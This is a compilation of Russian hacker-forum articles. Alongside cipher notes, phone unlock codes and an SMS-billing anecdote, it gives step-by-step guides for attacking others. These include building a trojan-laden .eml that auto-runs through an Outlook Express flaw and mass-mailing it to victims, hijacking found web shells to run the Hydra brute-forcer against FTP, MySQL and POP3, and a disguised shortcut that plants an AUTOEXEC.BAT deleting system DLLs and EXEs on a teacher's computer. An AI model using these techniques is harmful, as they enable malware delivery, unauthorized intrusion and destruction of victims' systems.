Балансировка «время-память»
Если T – время, требуемое для вскрытия, M – память, то при произведении T и M, не меньшем 263, шифр может быть вскрыт. Чем больше памяти, тем меньше времени нужно для вскрытия.
Цикловая структура A5
У. Дж. Чамберс пришел к выводу о том, что около 40% ключей алгоритма A5 приводят к циклу, длина которого (223-1)4/3 бит, что поддается вскрытию с привлечением минимальных вычислительных ресурсов (по материалам книги «Поточные шифры. Результаты зарубежной открытой криптологии»).
Обратная сторона медали
Прослушивание GSM-телефонов становится все более распространенным явлением. Но что делать, если ты не хочешь, чтобы телефонные переговоры превратились в улики или компромат? К счастью, существует оборудование для защиты передачи данных и голоса. Принцип действия большинства из них – дополнительное шифрование данных на участке между двумя абонентами. В большинстве случаев устройства защиты от прослушивания разрабатываются для моделей телефонов определенной фирмы. Вот некоторые из них.
Референт-GSM
Предназначен для работы с телефонами SonyEricsson в сотовых сетях GSM, поддерживающих функцию передачи данных. Исходная речь сжимается до уровня 2,4 Кбит/с, после чего шифруется и передается модемом мобильного телефона по GPRS. Базовая версия использует 32-битный сеансовый ключ.
Альфа-С
Устройство выполнено в виде отдельного блока с гарнитурой hands-free для телефонов Siemens. Технические характеристики девайса следующие: уровень криптостойкости – 106, время работы – около 10 часов, размеры – 65×40x20 мм.
На современном рынке представлено довольно много подобных устройств, среди которых «Талисман-GSM», Mobi-GSM и др. Плюс некая организация под названием «Бюро научно-технической информации» ведет разработку смартфона, обеспечивающего шифрование на основе 256-битного ключа.
Криптосмартфон Cancort
Предполагается, что телефон сможет работать в двух режимах: «открытый» и режим шифрования. Криптозащита будет распространяться не только на голосовые данные, но и на SMS, GPRS, электронную почту, MMS. Пользовать может самостоятельно генерировать сеансовые ключи. Кроме того, технические характеристики смартфона находятся на уровне лучших аналогов, имеющихся на рынке. Если прототип будет доведен до массового пользователя (у российских разработчиков это редкость), продукт рискует стать очень востребованным, даже несмотря на его высокую цену.

конецформыначалоформыПошутив как-то над другом, с программы Messenger-PRO 3, у него пропала крупная сумма с его мобильного телефона, тогда я решил разобраться в чём дело и начал проделывать некоторые тесты. Ну начьнём.
Тест. (но не на беременость )
Первым делом что я сделал, это положил деняг на свой мобильный счёт и позванил соседу, сказав что бы он зашёл ко мне и взял мобилку. Затем я начал думать, что бы это могло бы быть и как так получилось что у друга сняли деньги. Тогда я решил попробывать отправить с программы СМС. Т.е. От своего номера на друга (через программу). Отправил сразу десяток тупых СМС типо “блаблабла”. Но никакого результата не произошло. Затем я отправил ещё штук 20 СМС от своего номера к другу и мне позванила мама. После того как я поговорил с ней по телефону, я решиль взглянуть на баланс, на лице у меня появилась улыбка, денюжки ровно на 30 СМС исчезли. Тут я понял в чём дело.
Работа операторов и Clickatell’я.
Как я понимаю то все мобильные телесистемы работают так:
Отправитель СМС => Оператор (типо оффис) там и деньги снимают => Получатель СМС
Ну а Clickatell (Messenger-PRO 3) вроде как так же:
Отправитель СМС (Messenger-PRO 3) => Оператор (типо оффис) => Получатель СМС
Заключение.
Эта фишка проходит не на всех операторах, т.к. Clickatell не со всеми операторами стран мира заключил партнёрские отношения, вот ссылка на список всех стран где это проходит.
_http://www.clickatell.com/brochure/coverage/coverage.php

Коды доступа на телефоны стандарта CDMA
AUDIOVOX 7900
Menu #(кл. конверт) * 1
AUDIOVOX 8610/8910
##847446(Выкл) пароль 000000 или 111111 (Стандартный SPC 072096–для 8910)
AUDIOVOX 8910
для вывода телефона из сервис-режима ##27752345 вкл
AUDIOVOX 8910
для вывода телефона из сервис-режима ##737247 вкл
AUDIOVOX FT 3200
45680*47*869#1
COMPAL
**321456987##
EPSILON
**321456987##, **3214569871472365## снятие лок кода
Kyocera KX-2
111111 (потом правая смарт клавиша)
Kyocera K112
236288
LG DM510 / DM150
menu 3 0 далее код
LG SV590
Menu 0, SPC code : 852456
a-key : *542362*2539*
LG 2130/2230
#542362#*542362*
LG VX3200
Menu-0(000000)
LG VX9800(the V)
на большой клавиатуре нажать кнопку Sym, 3477247, CLR, CLR, 1
LG 5130
#542362#*735130*
LG 6130
#542362#*736130*
LG 5550 код доступа в инженерное меню
##7764726 save
Пароль на LG PM-325
инженерное меню : ##2342#
открытие окна AKEY : ##2539#
NOKIA 3586i
*3001#12345#
NOKIA Sprint
##3282#
NOKIA 6305 код программирования
##7764726 Send
NOKIA 8587
*#626#7764726#
SKY 1400 / 3000 / 5000 / 5100 / 5400(Израиль)
#7583538324#626#
SKY 5400 (корейская прош.) / 6100 / 6200
*759#626*7388464#
SKY 6400
*59#364*7388464
SAMSUNG A740 ( BELL )/A860 ( BELL )
##675 OK
SAMSUNG A530/A620/N195/N356
menu 6 *
SAMSUNG N362(Израиль)
4367905#*10*#*913620
SAMSUNG A460/N240/A500/N400
##000000
SAMSUNG A610
menu 9 *
SAMSUNG A630
menu 5 *
SAMSUNG A300/N105/A100/A562/A611
47*869#08#9 and menu 60
SAMSUNG A560
##3282#
SAMSUNG A660
menu ##000000 ok and ##3282 ok
SAMSUNG A670
menu 7 2 * (000000)
SAMSUNG A680
##000000##
SAMSUNG A790
menu 0 and menu 2 0
SAMSUNG A860
menu, setting *
SAMSUNG X, E, V-серия
6548#0**4#6 and 47*869#08#9 and 74153697193
SAMSUNG E300
741 53 697 193
SONY ERICSSON T608
923885 стрелка вправо
TELSON ТДС 320
menu 4 0 000000
MOTOROLA V710/V265
menu 073887* (быстро)
MOTOROLA V8160
FCN 13 раз цифра”0″ RCL
Kод доступа на Motorola RAZR V3 (americ)
#073887*
MOTOROLA MS600
5759789*# 3раза фото 915037
Пароль на MOTOROLA без а -кей
5 7 5 9 7 8 9 * # потом кнопку камеры 3 раза (код 915037)
Сделать полный сброс на MOTOROLA V8160
FCN 00**83786633 STO далее 32# 01#
MODOTTEL (Withus) W100/200/300
##948487 ok
VK X100
код програмирования 153147539741593TV
TOSHIBA 9100 / 9155 / 9500
В течении 10 сек. после включения 289 FCN #1
Z T E 150
код програмирования : *983*3641#
Как вводить A-key code
HYUNDAI 310/610: 2539 menu menu
NOKIA 3586/3588 2539 end end
Многие др.модели 2539**

конецформыначалоформыСразу предупреждаю что статья написанна для новичков в этом деле, поэтому не надо кричать и махать руками что типа всё это знаем и умеем, может вы и знаете и умеете, а другие только начинают учится и думаю им это будет полезно знать. Я знаю что об этом статьи уже писались и поэтому не претендую на полное авторство, но в тех статьях которые я видел всё описывалось скупо, отдельно, несвязанно с друг другом и неподробно, я же попытаюсь всё конкретизировать, обобщить и разложить по полочкам (даже разжевать:) так чтоб любой более менее начинающий юзверь мог во всё врубится. И так что для этого понадобится:
* The Bat! – один из лучших почтовых клиентов, (как у тебя его ещё нет, давай сейчас же дуй в какой нить поисковик , ищи его, скачивай, устанавливай и сноси нафиг свой ОутглюкЕхпресс, а то трояна впаришь не ты , а его впарят тебе, причём без твоего согласия).
* Zender – спецальная программа для посылки писем с трояном в дыру Оутглюка (качать с http://www.hack-it.by.ru/soft), о ней чуть ниже и поподробнее.
* Троян – в принципе любой, желательно чтоб не палящийся был.
* Ну и ещё какой нить joiner, их сейчас много развелось так что сами выбирайте, и желательно чтоб он умел менять иконки и закрывать анитивирусы и фаирволы ( и всего то….J).
И так способ этот рулит в Windows 95-98SE (без заплаток) и если установлен основной почтовый клиент это их же OutlookExpress 5.0, они сейчас пока наиболее распространены и в основном большинство народа юзает их….. да да WindowsХреновоРаботает ещё мало кто поставил…. Так что шансы нарваться на таких у вас большие (небось сами на этом софте то сидите . И так как вы раньше рассылали ламерам трояна, брали просто атачили к письму файл с троянам, писали какой нить текст в письме чтоб жертве захотелось открыть его, рассылали по спам листам и надеялись на то что найдётся жертва которая окажется полным ламерьём и откроет приатаченный файл и вот ты уже летишь по халявному инету или форматируешь ламеру диск ( а может и идёшь по тёмному коридору заложив руки за спину в сопровождении дяденьки с отдела «Рэ» , но щас народ уже в основном учёный пошёл и просто так файлы пришедшие почтой не открывает, а для начала бережно сохраняет на диск и потом с упоением насилует их всякими там АВП , Докторами Вьебами и Нортонами, а потом уже думает открывать его или нет. Ну…..нам это надо . Какой шанс что кто то откроет и запустит к себе твою коняшку…..правильно шанс просто мизерный. Поэтому то нам надо сделать так чтоб файл в письме запустился автоматически как только жертва получит это письмо ….. ну …хорошо же чтоб так было… и не надо ни кого уговаривать ( ещё раз подчеркну что рулит всё в Win9x и OE 5.0 ). И так для начала создаём файл mail.eml , затем открываем его в любом текстовом редакторе (желательно в WordPad) и вставляем в него такую вот запись:
From: SuperMegaXaker
To:
Subject: !!!!!Poluchai gad troyana!!!!
MIME-Version: 1.0
Content-Type: multipart/related;
type=”multipart/alternative”;
boundary=”====_ABC1234567890DEF_====”
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

–====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary=”====_ABC0987654321DEF_====”

–====_ABC0987654321DEF_====
Content-Type: text/html;
charset=”iso-8859-1″
Content-Transfer-Encoding: quoted-printable

–====_ABC0987654321DEF_====–

–====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name=”Troyan.jpg.exe”
Content-Transfer-Encoding: base64
Content-ID:

На этом месте будет файл трояна в base-64 кодировке…….(внешне будет выглядеть как большой и ровный блок текста )

–====_ABC1234567890DEF_====

–====_ABC1234567890DEF_====–

Кстати в проге zender уже лежит пример готового файл Mail.eml с уже вложенным туда трояном. Открыв его также в текстовом редакторе вы и увидете как в нём будет выглядит сам файл трояна тесктом, он там как раз и будет в base-64 кодировке. Выглядеть это будет примерно вот так:
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAA
AAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAgAAAAA
4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdC
BiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAB
QRQAATAEDAGVj+zwAAAAAAAAAAOAADwELAQED
ABAAAAAQAAAAYAAA4HkAAABwAAAAgAAAAABAAA
AQAAAAAgAAAQAAAAAAAAAEAAAAAAAAAACQAAAA
EAAAAAAAAAIAAAAAABAAABAAAAAAEAAAEAAAAAAA
ABAAAAAAAAAAAAAAAKSDAAB0AQAAAIAAAKQDAA
AAAAAAAAAAAAAAAAAAААА

Это и есть сам файл трояна , просто он в кодировке base-64. Но только не открывайте этот файл вашим Оутглюком, так как у автора проги видно есть «чуство юмора» и он вместо того чтоб вложить в это письмо для примера какую-нить безобидную программку…. вложил туда настоящего своего трояна и если вы это письмо откроете своим Оутглюком то он сразу автоматически запустится у вас на компе. Ну а вы думаете почему я вас Bat поставить просил. Да и ещё установите в Бате в настройках ассоциации файлов .eml с Батом и тогда такие файлы у вас будут открыватся не в Оутглюке а в Бате и вы сможете их спокойно открывать и смотреть, так как в Бате такого бага как в Оутлюке нету. И так письмо у нас есть, теперь в него надо вставить трояна. И что надо сделать чтобы вставить в ваше в письмо mail.eml уже сконфигурированного вами вашего родного трояна и как узнать как он выглядит в base-64 кодировке. Для этого нам и пригодится Бат. Открываем его. В нём создаём новое письмо, присоединяем к нему вашего трояна и жмём на кнопочку отправить , не важно кому так как мы его отправлять ни куда не собираемся, письмо соответственно попадёт в папку «Исходящие» (это если у вас Бат русифицирован), но нам оно там нам не нужно поэтому берём и перемещаем его в папку «Входящие» (просто перетаскиваем мышкой), затем открываем его там щёлкая по нему два раза и ищем в открывшемся окне вверху меню «Спецальное» а в нём выбираем «исходный текст» и увидим наше письмо токлько файл с нашим трояном будет там как раз в нужной нам base-64 кодировке, я уже говорил как он будет выглядеть (внешнее похоже на большой блок ровного и непрерывного текста), так вот выделяем именно только этот текст и копируем его в буфер обмена (для тех кто не знает кто это такая «буфер обмена» то копируйте в простой текстовой документ . Затем открываем наше уже заготовленное письмо mail.eml в текстовом редакторе и вставляем этот текст заместо того который я уже писал выше:
На этом месте будет файл трояна в base-64 кодировке…….(внешне будет выглядеть как большой и ровный блок текста)
Саму эту надпись конечно же удаляем!!! Сории что объясняю как даунам каким то , но ведь блин найдутся те которые так и не врубятся куда что и заместо чего вставлять. Так же можете взять пример письма из проги Zender (там он называется Mail.eml) и так же открыв его в тестовом редакторе удалить из него только текст (в base-64 кодировке) файла с трояном автора и вставить туда текст (в base-64 кодировке) уже своего сконфигурированного трояна. Кстати не забудьте поменять в файле строки From , To и Subject на нужные вам, и ещё поменяйте в строке Name=”имя_трояна.exe” на что нибудь другое типа name=”my_sexy_foto.jpg.exe”. То что вы там поставите и будет отбражаться в полях письма From, To, Subject и имя приатаченного файла , которое получит жертва. Кстати нам так же пригодится и Joiner , склейте с трояном какую нить фотку, потому что не у всех может Оутглюк стоять и когда жертва будет открывать файл уже самостоятельно ей предстанет перед глазами эта фотка, а ваш троян в это время будет делать своё грязное дело. Да, ещё за место расширения файла .exe можно поставаить .scr – это расширение у скринсейверов (программ-заставок) но действовать будет так же как и с .exe , просто таким образом можно немного усыпить бдительность жертвы. Сохраняемся, и всё письмо с трояном mail.eml готово. Теперь если открыть это письмо Оутглюком то файл автоматически запустится. Теперь о том как пользоваться Zenderom для отсылки этого письма, потому как обычной почтовой програмой его не отошлёшь так как она поменяет все заголовки на другие и троян в письме уже автоматически не запустится . Для начала прочтите там файл с описанием. Если не поняли то объясню на пальцах. В начале кладёте ваше письмо mail.eml в папку с Zenderom. Там же в папке есть файл user.txt . Он нам и нужен для рассылки. В первой строчке после from= пишем любой существующий адрес на каком нить бесплатном мыльном сервисе, главное чтоб он там существовал и чтоб сервак имел smtp сервер. Ну например from=vasya@mail.ru . Он в принцепе не имеет большого значения и нужен для того чтоб прога могла через этот мыльный сервак и его smtp сервер разослать письмо уже на адреса ваших жертв. А вот на следущей строчке уже просто пишите адреса ваших жертв, их может быть сколь угодно много главное чтоб они все начинались с новой строки. Теперь запускаете саму прогу zender.exe и она разашлёт ваше письмо с трояном по всем этим адресам. Кстати у проги нет интерфейса ( т.е. ни каких окошечек у вас не появится) , так что следить за тем как она рассылает письмо можно будет по самому соединению (значок который мигает у вас в трее когда вы подключаетесь к инету). Когда она разошлёт письмо по всем указаным вами адресам то появится окошко с надписью All done это значит что письмо разослано. А если вы рассылаете не на один адресс, а например по спам листу на несколько десятков адрессов, то чтоб не ждать пока прога разошлёт файл по всем этим адрессам и не терять много драгоценного время в инете делайте так….. заведите себе например на рамблере любое мыло и поставтье на нём переадресацию на имеющиеся у вас многочисленные адресса жертв, а в файле user.txt заместо адрессов жертв напишите всего один адрес этого вашего мыла на рамблере и всё, теперь запустите прогу и она пошлёт письмо на этот адресс, а уж сервак рамблера сам сделает за вас всю грязную работу и разашлёт письмо по всем адресам которые вы указали в переадресации. Так что теперь эфективность рассылки трояна у вас значительно повысится по сравнению с тем как вы его раньше рассылали простым дедовским способом ))). Так как ещё много тех кто сидит на Вынь9х и Отглюках . Кстати щас само письмо mail.eml сосотавленное таким вот образом чтоб автоматически запускался приатаченный к нему файл определяется многими антивирусами как троян даже если вы туда ещё ни кого трояна и не вставляли, у меня например мой ДокторВъеб ругается на это письмо что типа это troyanIframe ))), правда если письмо лежит в каком zip архиве то он на него молчит, хотя ведь сами архмвы он шмонать умеет хорошо, вот так то, так что на время составления письма придётся выгружать ваши антивирусные мониторы , а то ведь работать нормально не дадут ). Ну вот и всё. По моему всё понятно рассказал. У кого будут какие вопросы пишите (можете даже такие вот письма с автозапуском… у меня всё равно Бат стоит )))). Удачи.

Сразу же хочу заметить, что статья нацелена на новичков. Очень надоело наблюдать на форуме просьбы типа сломать мэил или асю. Надеюсь, после прочтения статьи, хотя бы 20% научатся делать это сами.
Все наверно слышали о брутерах?! В принципе, не важно, кто не слышал, может дальше не читать Я не буду описывать здесь брутеры, их качества, плюсы, минусы и т.д. и т.п. В данной статье будет поставлена лишь одна цель, завести свою гидру без получения высоких привилегий на сервере, будет достаточно вэб-шелла.
И так, начнём, немного о гидре:
Hydra – универсальный и уникальный в своём роде брутфорсер, умеет подбирать пароли к MySQL, MSSQL, POP3, IMAP, HTTP, HTTPS, ICQ, SSH, FTP, Basic-auth и др. Имеет встроенную поддержку работы через соксы и прокси. Скачать можно здесь http://thc.org/download.php?t=r&f=hydra-5.2-src.tar.gz
Приступим, что нам потребуется:
1. Вэб-шелл на сервере с доступом к коммандному интерпритатору – 1 шт.
2. Руки 2 шт. Можно обойтись и одной, главное чтоб прямая была
Многие наверно задались вопросом об вэб-шелле, где же его взять?! Да, вопрос специфичный, а ответ в свою очередь довольно таки простой – взломать и залить. “Я же новичок?!” подумали сейчас многие! Не спорю, я тоже
Теперь всё-таки немного придется отойти от нашей намеченной цели. Найдём себе вэб-шелл! Есть один простой, но проверенный способ, набираем в адресной строке браузера google.com, там в свою очередь в поисковой строке вбиваем, что-то типо:
intitle:c99madshell uname filetype:php
intext:c99shell intitle:c99shell
intext:edited by crazydaned
intext:safe-mode: off (not secure)
intitle: – c99madshell
inanchor:c99shell filetype:php
allintext: uid=() gid=() groups=()safe-mode: off (not secure
intitle:c99madshell uname
(intitle:locus7shell | intitle:r57shell) uname
intitle:r57shell intext:uname
safe-mode: off (no secure)
safe-mode: off (not secure) c99shell
Или подобные “нехитрые” запросы,и получим лист вэб-шеллов проиндексированных поисковиком. Кому не нравится такой способ, доставайте вэб-шеллы сами
И так, предположим, что шелл нашли. Смотрим Safe-mode: OFF, это хорошо, один из главных критериев, если наоборот то ищем другой, так же узнаём юзера коммандой id и смотрим /etc/passwd, есть ли доступ к /bin/bash, или к другому интерпритатору комманд, иначе мы не сможем выполнять нужные нам действия. Теперь нужно найти каталог на запись. Немного поковыряв, найдите каталог доступный на запись, и залейте в него архив с гидрой.
Залили? Ок, хорошо. Теперь распаковываем и устанавливаем, чтоб не приходилось выполнять команды отдельно их можно объединить через ;, вбиваем в шелле tar zxf hydra-5.2-src.tar.gz;cd hydra-5.2-src;./configure;make, жмём кнопочку Execute. Смотрим в окне, должен появиться лог выполнения команд, если лога нету, значит у юзера не хватает прав на выполнение. Если всё гуд, далее переходим в каталог hydra-5.2-src. Запускаем гидру, вбиваем ./hydra и любуемся выполнением нашей гидры
И так, теперь стоит подумать немного о безопасности, под ней я имею ввиду – не палить в логах частое обращение к вэб-шеллу, где лежит гидра. А сделаем это мы весьма хитрым образом В первую очередь переименовываем каталог hydra-5.2-src во что-нибудь менее палевное, к примеру, images, вбиваем в командной строке cd ..;mv hydra-5.2-src images. Дальше переходим в переименованный каталог и создаём там файл .htaccess с содержимым:
AddType application/x-httpd-php .gif
Вот теперь зальём наш шелл в этот же каталог уже с расширением .gif и пробуем открыть его, ну как?) В принципе расширение можете выбрать на своё усмотрение, им может стать как .pdf .rar .bmp и с таким же успехом .avi При желании можем даже запаролить этот каталог, сделать доступ по IP и много чего другого, но об этом я писать не буду, т.к. это тема отдельной статьи, да и смысла писать про это нет, читаем ман по Apache Спешу предупредить, что сервер должен поддерживать .htaccess, иначе наш шелл работать не будет и есть вероятность того что нас спалят по логам =
Теперь переходим к самой приятной части. Качаем хорошие словарики для брута, коих сейчас полно, советую лишь одно – использовать встроенные качалки сервера (наличие таковых узнаём при помощи команды which curl wget get lynx fetch и т.п.), т.к. заливать большие словари со своей тачки будет очень долго.
Манов и видео по использованию данного брутфорсера много, любимый гугл в помощь, но все же пару полезных конструкций приведу:
./hydra -L logins.txt -P passwords.txt www.site.com -t 255 ftp
./hydra -l ftpuser -p ftppass www.site.com -t 255 ftp
./hydra -L logins.txt -P passwords.txt www.site.com -t 255 mysql
./hydra -L logins.txt -P passwords.txt pop.site.com -t 255 pop3
Единственное что хотелось бы выделить, при каждом новом задании лучше сохранять всё в лог опцией -o, либо ставить вывод в файл знаком > (К примеру ./hydra -l hacker -p pass target.com ftp >logfile.txt). Этим самым облегчим себе работу, т.к. не придёться ждать полного выполнения команды, чтоб лицезреть результат, а просто периодически будем мониторить файлик logfile.txt И напоследок хочется сказать, что в данной чудо проге мы можем указывать количество потоков от 1 до 255, и, как правило, часто бывает полезным не напрягать серв на полную катушку В принципе, у меня – всё, начинаем брутить.

Здравствуйте, товарищи! Сегодня ночью делать было совершенно нефиг, ну и задумался: “а как можно сломать комп програмным способом, но так, чтобы это не сразу спалили?”. Я нашел ответ. Он находится в bat файлах.
План был таков:
СО СТОРОНЫ КЛАСУХИ И ОДНОКЛАССНИКОВ:
Я подхожу к компу, вставляю туда флеху, каспер(скорее всего) будет ругаца на файл autorun.inf, который автоматом копируеца на флеху с вирусованного компа класухи. Удаляем… Открываем флешку, там лежит файл Презентация.ppt. Это презентация MS Power Point, если кто не знает. Вот я щелкнул разок по этой презентации, экран моргнул пару раз, видимо павер пойнт загружаеца. Вот, йа показал свою презентацию, получил свою оценку, выдернул флеху, сел за свое место, а там дальше следующие люди показывают свои презентации. Вроде все нормально. Ну, када комп не нужен, класуха его вырубает, а патом включает, и обнаруживает то, что венда не грузица, или грузица но как то неправильно. Ребутит комп, и обнаруживает полное отсутствие венды на компе. ЧТО СЛУЧИЛОСЬ?!?!
Попробую объяснить. Разберем теперь и со стороны одноклассников(которые вапще ХЗ отом, что там на флехе хранится).
Вот я встаю с места по просьбе училки. Иду к столу, вставляю флеху в дополнительный слот USB в клаве. Комп опреледяет, что воткнуто что то похожее на флеху. Каспер(скорее всего) будет ругаца на файл autorun.inf, который автоматом копируеца на флеху с вирусованного компа класухи. Удаляем… Открываем флешку, там лежит файл Презентация.ppt. Это презентация MS Power Point, если кто не знает. На самом деле это не ppt файл. У нее на компе в параметрах “Свойства папки>Вид” стоит галочка на “Скрывать расширения для зарегистрированных типов файлов”. На самом деле этот файл имеет имя Презентация.ppt.lnk. Это, как вы поняли, ярлык. Но ярлык со значком от пауэр пойнта. Рядом со значком презентации есть папка test. Содержимое папки никто не знает. Файл Презентация.ppt.lnk запускает файл runner_copier.bat.
Файл runner_copier.bat совершает следующие действия:
-открывает файл pres.ppt с самой презентацией, которую йа должен показать
-копирует заранее написанный файл AUTOEXEC.BAT в C:.
Самое интересное заключается в павер пойнте. Так как он моргает перед полной готовностью, то многие, не зная, фчом прикол, могут не заметить моргнувшее окошко коммандной строки, которая, как раз и копирует заготовленный AUTOEXEC.BAT в заветный C:.
Теперь я расскажу, что находится в файле AUTOEXEC.BAT. Стандартный такой файл у меня имеет следующий вид:
goto %config%
:dos1
rem c:vc401vc
lh keyrus
lh mmouse
lh C:WINDOWSCOMMANDmscdex /d:12345678
lh dndn
bootgui=0
:dos2
rem essolo.com
lh keyrus
lh mmouse
lh dndn
bootgui=0
:win
rem c:essolo.com
set path=C:WINDOWS;C:WINDOWSCOMMAND;c:;c:windows;c:windowscomand;c:arc;c:dn
C:WINDOWSCOMMANDDELTREE /y C:WINDOWSTEMP*.*
mode con codepage prepare=((866) C:WINDOWSCOMMANDega3.cpi)
mode con codepage select=866
keyb ru,,C:WINDOWSCOMMANDkeybrd3.sys
goto continue
:meos
c:kolibrimeosload.com
:l:meosload.com
:continue
rem bootgui=1
Но я его немного подправил. Я всего лишь добавил в конец следующие строки:
cd
cd windows
del *.dll
del *.ini
cd system32
del *.dll
del *.exe
и все!
Действие самого вируса происходит следующим образом:
1)запускаеца файл Презентация.ppt.lnk
2)он ссылаеца на файл runner_copier.bat
3)файл runner_copier.bat заменяет файл AUTOEXEC.BAT, лежащий в C: на заранее заготовленый AUTOEXEC.BAT, который лежит на флехе в папке test.
4)дальше не происходит ничего. Пока включен комп, ничего не произойдет.
5) комп выключается
6) комп включаеца и при загруске венды загружается то, что описано в AUTOEXEC.BAT. Тут то и начинается самое интересное.
7) в этом батике указано следующее: загруска дров крысы, клавы, моника, и прочего.
8)как только загрузились драйвера, то этот батник дает задание венде самоудалица. Удаляюца файлы *.dll и *.exe из папок WINDOWS и system32.
9)скорее всего, комп не увидит никакой оси, т.к. больше половины файлов в папке WINDOWS и вовсех вложенных папках как раз дллки и екзешники.
end.
Если у кого есть идеи по изменению программы, пишите. НО! Программа должна удовлетворять таким критериям:
-малый размер
-незаметность
-неизвестность антивирям
-большие масштабы действия
-действие вируса осуществляется только после перезапуска компа(чтобы сразу не спалиться).
В остальном полная свобода.
Удачи в написании вирусов, товарищи!